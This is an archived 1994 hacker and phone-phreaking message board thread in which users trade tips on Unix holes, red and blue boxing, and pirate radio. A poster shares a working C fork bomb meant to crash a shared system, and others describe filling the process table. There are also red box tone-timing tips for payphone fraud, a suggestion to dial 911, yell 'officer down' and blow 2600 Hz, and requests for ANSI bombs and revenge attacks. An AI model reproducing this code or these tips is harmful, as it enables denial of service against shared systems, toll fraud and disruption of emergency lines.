Sun Jan 30 02:43:32 1994 well the standard filename "..." can be used, but is old If you are hiding it with inodes, etc, then you can't be expecting to access it all the time... Why not just encrypt it? Another way to do things that is wierd, is to make a directory, copy the file in there, and mount a filesystem on that directory. People can not get to the file via normal ways, until the filesystem is de-mounted. -Panzer From Biro@yabbs Sun Jan 30 05:13:03 1994 From: Biro@yabbs To: Tele@yabbs Subject: re: a Date: Sun Jan 30 05:13:03 1994 >>You still haven't told us what KRMA/KRA stands for.. we're dying to know. > I always thought KARMA was an ansi group.. ta.. their name never reached the forbidden shores of Australia From iceman__@yabbs Sun Jan 30 14:22:38 1994 From: iceman__@yabbs To: Fastjack@yabbs Subject: re: PW cracker Date: Sun Jan 30 14:22:38 1994 There are countless number of ways to gain root on different OS's like SunOS, there are holes that Sun hasn't even released patches for, you can gain root on 90% of SunOS systems on the net with the right knowledge. iceman From iceman__@yabbs Sun Jan 30 14:37:14 1994 From: iceman__@yabbs To: all@yabbs Subject: w0w Date: Sun Jan 30 14:37:14 1994 This is funny, who the fuck give s a shit if you have legit root, I think half the people here need to get off their high horses, half of you are just looking for confrontations. Who the fuck gives a shit, it's not a competition. If you think it's a competition, you need to get your priorities straight. It doesn't matter at all how much you know, if your an asshole, who would want to talk to you anyways? I'm just saying that some of you need to lighten up drastically, you come out looking terribly insecure, and thats what having an attitude is, insecurity. Don't even bother replying if your gonna respond in the same way. Hacking isn't about competition, it's not about who's superior, hacking should be something you do or yourself, to learn, and help others learn. Unix holes are no big deal, there are hundreds of scripts out there that exploit every hole ever found, holes that Sun hasn't patched yet, are you knowledgable enough to find them all on your own? Nobody is.. It's all about cooperation, nobody can get anywhere alone, flaming is pointless. iceman GnUL0D!@@!$234 werd h0h0h0 From Nomad@yabbs Sun Jan 30 15:27:47 1994 From: Nomad@yabbs To: all@yabbs Subject: misc... Date: Sun Jan 30 15:27:47 1994 Panzer, if I mount a file system then that will be a flag pointin to the file I wish to hide. When the admin types mount and sees a new entry where there was none before he is liable to just umount it. Crypting shit is ok but I want other programs to be able to utilize my files. Fuck having to decrypt it within a patch or something to add output. The ability to hide it, make it there for about say 2 secs and then hide it again is much more favorable. Iceman has a point, we're just lame. Nomad From panzer@yabbs Sun Jan 30 19:33:12 1994 From: panzer@yabbs To: Nomad@yabbs Subject: re: hiding Date: Sun Jan 30 19:33:12 1994 Explain a little more of what you want to do. Crypting can be done in a script. You just enter the passphrase at the beganning, and then after the processing of the encrypted data. Remember that by storing data on someone elses machine, it is inherently unsafe, and that sooner or later it will be discovered. -Panzer Who knows that those with legit root learn faster than those without. From cosmos@yabbs Mon Jan 31 11:19:14 1994 From: cosmos@yabbs To: all@yabbs Subject: A nifty little C program... Date: Mon Jan 31 11:19:14 1994 Here's something for a fun day on your local UNIX system,... main() { for(;;) { malloc(1000); fork(); } } type that puppy in and then compile it and then run it. Don't come yelling at me when your sysadmin calls you up... Cosmos From abort@yabbs Mon Jan 31 15:55:28 1994 From: abort@yabbs To: cosmos@yabbs Subject: re: A nifty little C program... Date: Mon Jan 31 15:55:28 1994 HEHEHE that's a nice program there. allocate 1000 ram and then fork and keep doing that until the cows come home, fork fork fork fork fork. GROW GROW GROW System goes SLOW SLOW SLOW I GOT LINUX. hehe I got Linux installed finally with all the G++ stuff and more. Too bad I dont have a way to get it wired to Inet 8(. I get to learn a lot more about Unix now. It's amazing how much your knowledge will jump when you have to actually set the thing up and admin it yourself. Sysadmining is a hell of a way to learn to hack. Now I just gotta teach myself some C++ on here. From Fastjack@yabbs Mon Jan 31 17:54:04 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: A nifty little C program... Date: Mon Jan 31 17:54:04 1994 Heheheh, that's pretty lame. Not to mention it was the same one (exactly) as the one posted by Mon Jan 31 00:29:00 Greenwich Mean. On alt.hackers. Go back and Check. Now either you and he are one and the same person, who feels obligated to show his cleverness to the world and empower everyone who can type 'cc' [I prefer gcc myself], or you are one hell of a lame copycat. That said, I will go on to state that the *BEST* way of learning Advanced Unix hacking is to admin. 'Nuff said. Fastjack From panzer@yabbs Mon Jan 31 18:21:22 1994 From: panzer@yabbs To: all@yabbs Subject: simple C program Date: Mon Jan 31 18:21:22 1994 Basically if you run that simple little program on a Linux box, you will completely crash the machine. It will not come back except via reboot. You can also just write a program that recursively calls itself allocating 100k of mem or something. This way you hog mem as opposed to proccesses. All depends what your objective is. Linux comes with some open holes you should fix. Either as an exercise to the readers, or ask if you want to know some of 'em... For example, the SLS dist I originally used had /usr/lib world writable... -Panzer From cosmos@yabbs Mon Jan 31 18:50:40 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: A nifty little C program... Date: Mon Jan 31 18:50:40 1994 Did I say I wrote it dipshit??? No, it just caught my eye and I rather enjoyed it. I do admin numnuts. Nuff said. Cosmos From htoaster@yabbs Mon Jan 31 20:21:08 1994 From: htoaster@yabbs To: panzer@yabbs Subject: holes in free systems Date: Mon Jan 31 20:21:08 1994 All systems come with holes. While people are mentioning them in linux, here is a pretty big one in any of the BSDs. If people install the system but never install the crypted password stuff (it is a seperate package due to export restrictions, but trivial to install) it doesn't encrypt using any method in /etc/passwd.master (the shadow file). So if the account is *'ed out to make it not loginable you can just type * in the password field... most people use the security stuff though... alex From JasonLee@yabbs Mon Jan 31 21:13:00 1994 From: JasonLee@yabbs To: cosmos@yabbs Subject: re: A nifty little C program... Date: Mon Jan 31 21:13:00 1994 COsmos said: Here's something for a fun day on your local UNIX system,... main() { for(;;) { malloc(1000); fork(); } } ----------------------------- Well, the only problem with that is that on a decent, semi-secure system luck the one I'm unfortunate enough to have an account on, there's a process limit. Yes, I can only have something like 40 processes running at the same time. The only one that would screw over is me, since it would waste the CPU time I'm allowed. JasonLee From htoaster@yabbs Mon Jan 31 22:12:59 1994 From: htoaster@yabbs To: JasonLee@yabbs Subject: re: A nifty little C program... Date: Mon Jan 31 22:12:59 1994 In message re: A nifty little C program..., JasonLee said: > Well, the only problem with that is that on a decent, semi-secure system > luck the one I'm unfortunate enough to have an account on, there's a > process limit. Yes, I can only have something like 40 processes running > at the same time. Have you played around with unlimit. You may be able to get more than 40 processes but 40 is the softlimit set by default or whatever... alex From abort@yabbs Mon Jan 31 22:13:35 1994 From: abort@yabbs To: Fastjack@yabbs Subject: re: A nifty little C program... Date: Mon Jan 31 22:13:35 1994 haha, you had to bust on someone hahahahahahhaahhahahaha fuck off hahahaha wake up and taste reality, noone reads alt.hackers anymore, noone cares where cosmos got that, noone gives a shit wether someones a lamer or not BUT YES, adminning is one hell of a way to learn shit. From PHreedOm@yabbs Tue Feb 1 06:18:47 1994 From: PHreedOm@yabbs To: all@yabbs Subject: 2600 Date: Tue Feb 1 06:18:47 1994 hello do you know a site internet that has the '2600' magazine? thank bye PHreedOm From cosmos@yabbs Tue Feb 1 08:09:28 1994 From: cosmos@yabbs To: PHreedOm@yabbs Subject: re: 2600 Date: Tue Feb 1 08:09:28 1994 its harcopy. shell out $4.00 or whatever it costs and get it. good luck finding a store with it. Tower records on Clark in Chicago has em... Cosmos From PHreedOm@yabbs Tue Feb 1 08:53:26 1994 From: PHreedOm@yabbs To: cosmos@yabbs Subject: re: 2600 Date: Tue Feb 1 08:53:26 1994 thanks bye PHreedOm From cosmos@yabbs Tue Feb 1 18:11:46 1994 From: cosmos@yabbs To: arachnoi@yabbs Subject: re: Needs Date: Tue Feb 1 18:11:46 1994 Whats your reason for asking?? No, I am not the admin on but I am friends with karl denninger the sysadmin there. Have a beef with the system?? Cosmos From Fastjack@yabbs Tue Feb 1 19:02:56 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: A nifty little C program... Date: Tue Feb 1 19:02:56 1994 Okay cosmos... No harm done..... I was just hoping for something besides a little fork program that any competent C programmer could whip off in 2 seconds (again, literally). And yeah, you didn't say you wrote it.... Besides being a cool joke, it accomplishes little besides denial of service to the target machine, obviously. Now that we have that out of the way, anybody have any thoughts on how to take out a VAX without going root? [or whatever they have] I'm not very fond of VMS at all, but the sheer numbers in use make it nice to know a few things... Fastjack From Fastjack@yabbs Tue Feb 1 19:08:43 1994 From: Fastjack@yabbs To: abort@yabbs Subject: re: A nifty little C program... Date: Tue Feb 1 19:08:43 1994 Yeah, no one cares where cosmos got it. But 'no one reads alt.hackers anymore? C'mon. It aint alt.2600 or alt.forgery but learning the system, what is possible, and past hacks is the way to go about it. Maybe the group is old and getting stale, but now that all the clueless masses regularly post 'how to post to alt.hackers' msgs, but it sure beats a bunch of the cluless masses sitting around exchanging C progs that they don't understand and asking for accounts/GODs/whathaveyou.... Fastjack From abort@yabbs Tue Feb 1 19:12:57 1994 From: abort@yabbs To: Fastjack@yabbs Subject: re: A nifty little C program... Date: Tue Feb 1 19:12:57 1994 HEY, I have guys ask me for accounts all the time. And I get this one too. "hey man, how can I change my grades?" and "Tell me how to hack root" and "How can I blow up my system" hahaha a million miles away and still smelling them. The best one I have ever seen anywhere is "what's a soldering iron" From cosmos@yabbs Tue Feb 1 20:35:02 1994 From: cosmos@yabbs To: arachnoi@yabbs Subject: re: Needs Date: Tue Feb 1 20:35:02 1994 I tripped across a sniffer?? Mail me private in more detail, I want to hear this... I know we got some lamer using .rhosts about a week ago but I havent heard about a sniffer...I ll have to talk to Karl about this. Cosmos From cosmos@yabbs Tue Feb 1 20:38:05 1994 From: cosmos@yabbs To: abort@yabbs Subject: re: A nifty little C program... Date: Tue Feb 1 20:38:05 1994 No, my personal favourite is: 6.5 mhz whats that? or so do I drop the 6.5 crystal in the quarter slot? Honest to God, that last one is 100% real...quoted at a chicago 2600 meeting last year. Cosmos From dmonger@yabbs Tue Feb 1 22:02:37 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: A nifty little C program... Date: Tue Feb 1 22:02:37 1994 I forgot to put the malloc call in when I wrote it several years ago. running across campus at 2:00 am to reboot a DECstation in your school library is cool.... -p From paradox@yabbs Wed Feb 2 13:45:41 1994 From: paradox@yabbs To: cosmos@yabbs Subject: re: A nifty little C program... Date: Wed Feb 2 13:45:41 1994 Hey man... at the last 2600 meet there was a lamer who just came so he could get plans for a red box... that's all. Everybody just smiled and ignored him though... where to people hear about these meetings? Eventually somebody will catch on and try something stupid if we aren't careful From Fastjack@yabbs Wed Feb 2 16:24:47 1994 From: Fastjack@yabbs To: all@yabbs Subject: re: A nifty little C program... Date: Wed Feb 2 16:24:47 1994 At any rate, I prefer not to allocate the memory..... That just causes the systen to swap out, and slows it down....when I want to bring it down, I just fill the process table... FJ From tknight@yabbs Wed Feb 2 20:59:45 1994 From: tknight@yabbs To: all@yabbs Subject: ...... Date: Wed Feb 2 20:59:45 1994 Today i went out and bought a tone dialer. I had to get the type with no memory,because they we're all out of the others(i know they cancelled them) But i can't figure out any reason icouldn't make a redbox out of this one. I would just have to press the star button manually for each nickel. My question is,HOW DO IGET THE BACK COVER OFF??? the damn thing has no screws or anything. help tknight From binkley@yabbs Wed Feb 2 23:39:09 1994 From: binkley@yabbs To: paradox@yabbs Subject: re: A nifty little C program... Date: Wed Feb 2 23:39:09 1994 Ya, I was at the last 26'th meeting, what time did you show up?? I was on from begining tiull like 1:20PM l8r binkley From JasonLee@yabbs Wed Feb 2 23:41:20 1994 From: JasonLee@yabbs To: tknight@yabbs Subject: re: ...... Date: Wed Feb 2 23:41:20 1994 That was probably a bad idea getting the non-memory version. The timing of the beeps has to be within a certain range (something like +/- .42 msec) for the sound to work. I don't know where the screws are, but good luck. JasonLee From cosmos@yabbs Thu Feb 3 05:16:04 1994 From: cosmos@yabbs To: tknight@yabbs Subject: re: ...... Date: Thu Feb 3 05:16:04 1994 HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA!!! Listen, I am so tempted to rip you apart for this, but oh well. Maybe you should have read a little more about a redbox or asked a few more questions before you wasted your money. You CANNOT MAKE A REDBOX FROM THE NON-MEMORY DIALER. Perdiod, amen. Their is no goddamn way you can manually hit the keys at the exact timing for the required tone...get a memory dialer and program the priority keys for 5 *'s heh. Cosmos From jcjc@yabbs Thu Feb 3 06:23:13 1994 From: jcjc@yabbs To: @yabbs Subject: re: A nifty little C program... Date: Thu Feb 3 06:23:13 1994 jajaja, red boxing .. how lame, - go to Cellular!! dammit anyways, oki 900 - and assembler, and yer set.. Hasta Call Backwarding From jcjc@yabbs Thu Feb 3 06:26:51 1994 From: jcjc@yabbs To: cosmos@yabbs Subject: red boxxxxxings lame Date: Thu Feb 3 06:26:51 1994 damm, why does anyone give a shit about red boxing, when you can blue box off chile, el salvador, China, and so on, just scan for routing codes.. hey, what up with Celllular, .. forget red boxing. too fucking lame hhaa, Hasta --=Call Backwarding=000 From SamIam@yabbs Thu Feb 3 10:05:19 1994 From: SamIam@yabbs To: tknight@yabbs Subject: re: ...... Date: Thu Feb 3 10:05:19 1994 Sure you can time your punches to 35ms? I think NOT! From htoaster@yabbs Thu Feb 3 10:16:37 1994 From: htoaster@yabbs To: all@yabbs Subject: redboxing Date: Thu Feb 3 10:16:37 1994 the radio shack dialer plays the codes way slow as well, compared to what they really sound like. If you want to compare them in a nice and easy way find a payfone that doesn't mute the handset when you drop quarters in (lots of handsets still don't), tape the quarter tone, digitize it, and then digitize your redbox. Put one on the left channel and one on the right channel. Pretty big difference in speed, and the freqs are a little off as well if you us a 6.5535 crystal (6.5 is better, 6.4xxx something is supposed to be the best). All of this redbox stuff is quite lame though. You aren't learning about the system, just abusing it for your own personal benefit. They might have been cool a few years ago, but who cares these days. Is it really that big of a deal to pay a few dollars for ld calls... If you really want a cool box look at the Hacktic demon dialer. I saw the one that the 2600 people own a few years ago. Pretty impressive. And they claim it can be put into a very small case (about the size of a memory dialer, maybe smaller). Lets you pretty much program any two channel (or maybe more) sound you want, set them up for hotkeys, has a access code you need to type in to get to the fun stuff (otherwise it is just a dtmf player). expensive though... alex From Phain@yabbs Thu Feb 3 13:35:04 1994 From: Phain@yabbs To: all@yabbs Subject: Pirate Radio? Date: Thu Feb 3 13:35:04 1994 Greetings, all . I was curious if anyone out there knew where I could locate a phile or two about the setup of a pirate radio station . The only refrence I've found was from a 'zine called Magick, and the info was questionable . I'm a mass comm major at a school with no attitude . We have the equipment for a station, but we can't get funding for a licence. Even if we did, the heads of the department would squash free thought. I've got a group of people who want to invest the time involved . We just need the info . I've been all over the 'Net looking for info, but the kinds of things usually listed under "radio" just don't cut it . Thanx, Phain. "Information wants to be free" -Bruce Sterling From paradox@yabbs Thu Feb 3 14:34:02 1994 From: paradox@yabbs To: binkley@yabbs Subject: re: A nifty little C program... Date: Thu Feb 3 14:34:02 1994 The one in philly? I was there from like 6 till 9.... From hawkwind@yabbs Thu Feb 3 15:28:24 1994 From: hawkwind@yabbs To: jcjc@yabbs Subject: re: red boxxxxxings lame Date: Thu Feb 3 15:28:24 1994 Ok, so you suggest blue boxing off the trunk into another country.. *Great* --but how do you stop ole mother ESS's filter alarms going off like a cat out of hell? --and don't give me any of this pink-noise above 3000Hz stuff.. Any ideas? Hawk. From arachnoi@yabbs Thu Feb 3 16:22:47 1994 From: arachnoi@yabbs To: hawkwind@yabbs Subject: Officer Down Date: Thu Feb 3 16:22:47 1994 Want to have some phun? 911 is a tandum to the local CO. dial 911 , yell officer down and blow 2600 HZ Heheheheh From hawkwind@yabbs Thu Feb 3 18:52:20 1994 From: hawkwind@yabbs To: arachnoi@yabbs Subject: re: Officer Down Date: Thu Feb 3 18:52:20 1994 Now if only I was located in the US... still I reckon I might just be able to find a way onto the US 911 tandum.. ;-) From cosmos@yabbs Thu Feb 3 19:32:23 1994 From: cosmos@yabbs To: all@yabbs Subject: #hack = #phreak Date: Thu Feb 3 19:32:23 1994 SO when did this forum become the phreaking forum?? Pffft...mister bluebox over there I aint buying your load of crap. Cosmos From JasonLee@yabbs Thu Feb 3 21:11:50 1994 From: JasonLee@yabbs To: htoaster@yabbs Subject: re: redboxing Date: Thu Feb 3 21:11:50 1994 There is also a program for DOS + sound blaster called BlueBeep which will mix and match tones at whatever frequency you desire. What I'm planning to do is to buy one of those talking Hallmark cards, take it apart, then record the red box sound onto the device. It may just be abusing the system, but I can't afford LD calls. Oh well.... JasonLee From hello@yabbs Thu Feb 3 23:19:37 1994 From: hello@yabbs To: Phain@yabbs Subject: re: Pirate Radio? Date: Thu Feb 3 23:19:37 1994 Dear Phain: I have some stuff you may be interested in. check in @)mail From cosmos@yabbs Fri Feb 4 06:00:14 1994 From: cosmos@yabbs To: JasonLee@yabbs Subject: re: redboxing Date: Fri Feb 4 06:00:14 1994 When you care enough to cheat the very best... Cosmos From PHreedOm@yabbs Fri Feb 4 10:01:03 1994 From: PHreedOm@yabbs To: JasonLee@yabbs Subject: re: redboxing Date: Fri Feb 4 10:01:03 1994 Have you more infos about BlueBeep? Bye PHreedOm From Fastjack@yabbs Fri Feb 4 11:33:06 1994 From: Fastjack@yabbs To: PHreedOm@yabbs Subject: re: redboxing Date: Fri Feb 4 11:33:06 1994 Hey--- The version of BlueBeep I have is 007. I got it from an ftp site [I'll have to look it up]....haven't used it yet but it seems to be a very interesting program, by the docs... You may also be interested in a program called ToneLoc. The newest version I know of is .98 Beta 10....supposed to be the best scanner program made... If anyone knows where to find a copy of CodeThief to complete my collection, let me know... Fastjack From JasonLee@yabbs Fri Feb 4 16:29:50 1994 From: JasonLee@yabbs To: PHreedOm@yabbs Subject: re: redboxing Date: Fri Feb 4 16:29:50 1994 What more do you need to know? JasonLee From alung@yabbs Fri Feb 4 16:37:21 1994 From: alung@yabbs To: PHreedOm@yabbs Subject: re: 2600 Date: Fri Feb 4 16:37:21 1994 some Barnes & Noble bookstores also carry it don't be affraid to ask at the info tesk, they can get it. From Bolus@yabbs Fri Feb 4 18:35:27 1994 From: Bolus@yabbs To: all@yabbs Subject: RedBox.. Date: Fri Feb 4 18:35:27 1994 Does this red box stuff really work? I remember this program I had for the C64 when I was 14 called PhoneMan. It supposedly made legit quarter tones. I taped the tones, ran to the phonebooth and blasted them thru the handset. Nothing happened. Is the red box usable on all pphone system or was this program a piece of crap. It was on the 64..? From binkley@yabbs Fri Feb 4 23:18:06 1994 From: binkley@yabbs To: all@yabbs Subject: Bluebox. Date: Fri Feb 4 23:18:06 1994 I has a sound board, and 2 different blue box programs... They were all a little bit off. Even the touch tone tones, wouldn't work. I taped the whole thing on a mini-corder, and blasted them, but it didn't work... From cosmos@yabbs Sat Feb 5 14:26:33 1994 From: cosmos@yabbs To: Bolus@yabbs Subject: re: RedBox.. Date: Sat Feb 5 14:26:33 1994 Its been forever since I have used it but yes, it still works on LONG DISTANCE ATT calls. If you want to dial local you would have to use the 10att+acn to use it. Cosmos From amadeus@yabbs Sat Feb 5 15:12:11 1994 From: amadeus@yabbs To: cosmos@yabbs Subject: 6.5 chrystals Date: Sat Feb 5 15:12:11 1994 so lemme get this straight...youtake the crystal and put it in the slot, and then it makes these 5 little beeps and it gives you a quarters credit?? gee, that seems 2 easy! -----------I was sooooo lame when I first got a redbox... From amadeus@yabbs Sat Feb 5 15:16:48 1994 From: amadeus@yabbs To: tknight@yabbs Subject: redboxing w/ a nomem tone d Date: Sat Feb 5 15:16:48 1994 with the cover, you're gonna have to pry it open...but I _strongly_ advise against useing one with no memory, cauz it's gonna take you a *long* time to enter a 1.30$ when you're useing nickels... oh, and don't forget to use 10288! From amadeus@yabbs Sat Feb 5 15:19:57 1994 From: amadeus@yabbs To: tknight@yabbs Subject: re: ...... Date: Sat Feb 5 15:19:57 1994 I have a better suggestion if you _really_ want to redbox...why don't you get the VOC format of a 25 cent tone being entered, then record it onto tape?? I have it, so email if you wnat it! From amadeus@yabbs Sat Feb 5 15:23:54 1994 From: amadeus@yabbs To: Phain@yabbs Subject: re: Pirate Radio? Date: Sat Feb 5 15:23:54 1994 under current FCC regs, a fadio station isn't considered pirtae unless it broadcasts more than 5 mile radius for more than 3 hours a day... if you keep it under taht, you can have your station withouth teh fedz trying to triangulate you...I'll look around for some ideas for ya. From tknight@yabbs Sat Feb 5 17:20:06 1994 From: tknight@yabbs To: all@yabbs Subject: .... Date: Sat Feb 5 17:20:06 1994 sorry about that little redbox question..i'm not that stupid..i just missed the bluebox age and all.... i'm more intrested in learning about the phone sytem anyways.. i finally pried myself of my computer last night and went canning..didnt do any beige boxing..was just mosooking for weird shit.. found a sticker that says all information on this trunk is in the cosmos database..and igot some routing information.. no manuals or handsets but i dont really expect to get any out of a can... ANyways,has anyone heard of DunsNet... When you connect it says dunsnet and then they're running the same networking shit as telenet(no iwont call it sprintnet,ever!) the dnic is the same also but it wouldn't let me connect to anything.. some one said this might be like gte net in california but ihavent found any valid addresses.. Sorry about the spaces between lines,net lag sucks. tknight From cosmos@yabbs Sat Feb 5 17:31:10 1994 From: cosmos@yabbs To: amadeus@yabbs Subject: re: 6.5 chrystals Date: Sat Feb 5 17:31:10 1994 I wish I had a dictionary to explain sarcasm in my posts...sheesh. Cosmos From CB@yabbs Sun Feb 6 12:23:07 1994 From: CB@yabbs To: amadeus@yabbs Subject: re: redboxing w/ a nomem tone d Date: Sun Feb 6 12:23:07 1994 I was wondering what you mean by the nickles. Some RBOCS change the tone values around. But I don't see where this matters whether you use the memory dialer or not. Brinx From zenamako@yabbs Mon Feb 7 00:45:22 1994 From: zenamako@yabbs To: Fastjack@yabbs Subject: re: redboxing Date: Mon Feb 7 00:45:22 1994 In message re: redboxing, Fastjack said: > If anyone knows where to find a copy of CodeThief to complete my hmm, i have codethief 2.5...but it's pretty lame.. go for toneloc.. prolly the best scanner at the moment.. umm.. codethief is basically just an oldish scanner.. without the bells and whistles.. i *think* it scans more than just phone numb zen From DrClaw@yabbs Mon Feb 7 01:07:18 1994 From: DrClaw@yabbs To: all@yabbs Subject: internet breakings Date: Mon Feb 7 01:07:18 1994 What do you people think about the new cert advisories? Shit someone out there really is sitting pretty about now... if you haven't read it i would highly suggest reading it.. hasta. Dr_Claw From cosmos@yabbs Mon Feb 7 06:04:36 1994 From: cosmos@yabbs To: DrClaw@yabbs Subject: re: internet breakings Date: Mon Feb 7 06:04:36 1994 CERT?? Pfft. Once again the mentally challenged CERT team has whipped up frenzy among net users and terrified sysadmins everywhere with their latest *warning*. Basically, it's PANIX reborn. Like usual, the warning is "hey everyone there are nast uebercrackers using the same bugs that were used before that we never bothered to tell you how to fix--just warning you again folks!" For the admin that has plenty of time and resources this problem was fixed at their own hands before. But not all admins have plenty of time or expertise to patch source code and to fix all the holes that CERT wont tell them how to fix. Some poor admin running10 machines and half of a university computer science department isnt going to have the resources to do this. pity. Cosmos From PHreedOm@yabbs Mon Feb 7 06:30:26 1994 From: PHreedOm@yabbs To: JasonLee@yabbs Subject: re: redboxing Date: Mon Feb 7 06:30:26 1994 I need to know a site ftp that has the program BlueBeep bye PHreedOm From Phain@yabbs Mon Feb 7 10:04:19 1994 From: Phain@yabbs To: amadeus@yabbs Subject: re: Pirate Radio? Date: Mon Feb 7 10:04:19 1994 On de FCC laws, is it either 5 mile radius, or 3 hours ? Could I broadcast for 8 hours with a one mile radius and the fedz not care? Thanx, Phain . From xenon@yabbs Mon Feb 7 15:01:29 1994 From: xenon@yabbs To: Phain@yabbs Subject: re: Pirate Radio? Date: Mon Feb 7 15:01:29 1994 In message re: Pirate Radio?, Phain said: > On de FCC laws, is it either 5 mile radius, or 3 hours ? Could I > broadcast for 8 hours with a one mile radius and the fedz not care? You can broadcast all you want w/o a license for a 1 mile radius. I forget the specific wattages off-hand... From DrClaw@yabbs Mon Feb 7 22:57:40 1994 From: DrClaw@yabbs To: all@yabbs Subject: ansi bombs wanted Date: Mon Feb 7 22:57:40 1994 ok this is a really stupid request ...but can anyone send me some text on how to make ansi bombs or actualy send me some for both the macintosh and pc....i would really appreciate it.... please mail thanks.... From Jeremiah@yabbs Wed Feb 9 12:32:08 1994 From: Jeremiah@yabbs To: DrClaw@yabbs Subject: re: ansi bombs wanted Date: Wed Feb 9 12:32:08 1994 I have a program that supposedly writes Ansi Bombs... I never really checked it out... Tell me how I can get it to you, and we can arrange a file transfer.... From Fastjack@yabbs Wed Feb 9 21:00:22 1994 From: Fastjack@yabbs To: PHreedOm@yabbs Subject: re: redboxing Date: Wed Feb 9 21:00:22 1994 OK.... I don't know the site, but archie for 'bbeep007'. When I got it, it was in an incoming directory somewhere, so it might not show up.... FJ From CB@yabbs Wed Feb 9 23:32:59 1994 From: CB@yabbs To: Jeremiah@yabbs Subject: re: ansi bombs wanted Date: Wed Feb 9 23:32:59 1994 I would like this program. If you could, UUencode it, then mail it to Thanks alot. Greatly appreciated. Brinx From NJDEVIL@yabbs Thu Feb 10 09:12:38 1994 From: NJDEVIL@yabbs To: cosmos@yabbs Subject: Trojan horse Date: Thu Feb 10 09:12:38 1994 Cos, what's a trojan horse program? Is there any defense against it? My home sys is being penetrated and some of us are getting annoyed. any comments? NJDEVIL From PHreedOm@yabbs Thu Feb 10 12:18:49 1994 From: PHreedOm@yabbs To: Fastjack@yabbs Subject: re: redboxing Date: Thu Feb 10 12:18:49 1994 thanks for the infoz. Now I'm finding the program . bye PHreedOm From Gnarr@yabbs Thu Feb 10 21:40:00 1994 From: Gnarr@yabbs To: all@yabbs Subject: Just curoius..... Date: Thu Feb 10 21:40:00 1994 I was wondering if anyonek knew how to hack Muses or would like to help me out a little bit by showing me some stuff about Hacking? THis may sound stupid to some people but I have just been itching to get this one Muse bad for screwing me up BIG TIME and I don't know too much about Hacking. From Dprogram@yabbs Fri Feb 11 00:39:44 1994 From: Dprogram@yabbs To: Fastjack@yabbs Subject: re: redboxing Date: Fri Feb 11 00:39:44 1994 I haven't run it yet, but I have found "" in the /incoming directory of From cosmos@yabbs Fri Feb 11 07:12:03 1994 From: cosmos@yabbs To: NJDEVIL@yabbs Subject: re: Trojan horse Date: Fri Feb 11 07:12:03 1994 SImply put, its like the story. A seemingly benign program that achieves nasty results. Like a modified ls put in your directory that instead of listing files deletes them. Cosmos From Jeremiah@yabbs Fri Feb 11 16:10:21 1994 From: Jeremiah@yabbs To: CB@yabbs Subject: re: ansi bombs wanted Date: Fri Feb 11 16:10:21 1994 I have no idea how to do that, since I'm new to the net, so if you could send me detailed information on how to set up everythinh and I'll me happy to. From Jeremiah@yabbs Fri Feb 11 16:12:49 1994 From: Jeremiah@yabbs To: all@yabbs Subject: Information Date: Fri Feb 11 16:12:49 1994 Could someone out there recommend GOOD, informative hacking/phreaking/etc. E-Magz out there? I'm interested in things from Novice through Advanced.... Thanx From Gnarr@yabbs Fri Feb 11 22:30:27 1994 From: Gnarr@yabbs To: all@yabbs Subject: hacking... Date: Fri Feb 11 22:30:27 1994 Hi! i really want to get back at this shitty muse that really FUCKED me up! I would just love to really mess htem up somehow. Problem is I know nothing about hacking whatsoever and the only thing remotely hacking like is getting lucky and guessing some guuys password on a Mud. I'd appreciate it if somone would maybe help me out a bit? ++++++++++++++++++++++++++++ GnaRR ++++++++++++++++++++++++++++++ From Gnarr@yabbs Fri Feb 11 22:31:28 1994 From: Gnarr@yabbs To: all@yabbs Subject: re: hacking... Date: Fri Feb 11 22:31:28 1994 I mean the only thing I've done is guess a password. From cosmos@yabbs Sat Feb 12 14:20:23 1994 From: cosmos@yabbs To: Gnarr@yabbs Subject: re: hacking... Date: Sat Feb 12 14:20:23 1994 You call crashing a MUSE hacking?? Get the fuck out of here and get a goddamn clue. Cosmos (whos grumpier than usual) From Gnarr@yabbs Sat Feb 12 14:50:18 1994 From: Gnarr@yabbs To: cosmos@yabbs Subject: re: hacking... Date: Sat Feb 12 14:50:18 1994 Listen Asswipe. I said I knew very little about hacking. It was obvious by my message and I don't need a littel fuck like you telling me that I don't know anything cause I know that. All I did was ask for some help, and I didn't need a motherfucking shithead to do this to me. Gnarr (WHo ain't to pleased himself)/s From paradox@yabbs Sat Feb 12 15:44:13 1994 From: paradox@yabbs To: all@yabbs Subject: re: hacking... Date: Sat Feb 12 15:44:13 1994 Am I the only one who's noticed that /pub/CuD has NOTHING in it? From htoaster@yabbs Sat Feb 12 16:09:18 1994 From: htoaster@yabbs To: paradox@yabbs Subject: re: hacking... Date: Sat Feb 12 16:09:18 1994 In message re: hacking..., paradox said: > Am I the only one who's noticed that /pub/CuD has NOTHING in > it? ftp or use gopher from here and look through all of their stuff....mondo text files alex From Xela@yabbs Sat Feb 12 16:33:48 1994 From: Xela@yabbs To: paradox@yabbs Subject: CuD Date: Sat Feb 12 16:33:48 1994 I think EFF got tired of all the traffic so they don't shadow any stuff anymore. Try FTPing, /pub/CuD/cud Have a better one... Xela From cosmos@yabbs Sat Feb 12 18:37:14 1994 From: cosmos@yabbs To: Gnarr@yabbs Subject: re: hacking... Date: Sat Feb 12 18:37:14 1994 *SIGH* Still clueless,,, Cosmos From cosmos@yabbs Sun Feb 13 15:26:17 1994 From: cosmos@yabbs To: Gnarr@yabbs Subject: re: hacking... Date: Sun Feb 13 15:26:17 1994 Okay, seeing as I really did not think your shitty little request deserved a reply before, I will make a brief one now. Hacking is NOT, I repeat NOT a revenge tool or how do I crash someones system. Hacking is an art form. It is exploration, finding a new method to obtain something, using an unconventional means to obtain your goal. Hacking NEVER invovles trashing a system or revenge. If that is what you think it is then go join the rest of the media bandwagon and cybershitheads who don't have the slightest goddamn clue. Cosmos From CB@yabbs Sun Feb 13 15:47:37 1994 From: CB@yabbs To: Jeremiah@yabbs Subject: re: ansi bombs wanted Date: Sun Feb 13 15:47:37 1994 It is pretty easy. I am assuming that you are on a UNIX system. If you are it will be a sinch. If you are on any other platform, and whould similar to what I describe although probably not identical. There is a program that converts 8 bit data to 7 bit data. I am not sure about the techincal shit behind it. But you take a file such as fiffft. uuencode fifft I am pretty sure this is how it works. I am a trial and error guy. If it doesn't work the first time, I try something different. If I get skitzed out then I just use the man uuencode command (once again if you are on unix). This will tell you how to do it. Depending on what mail program you use 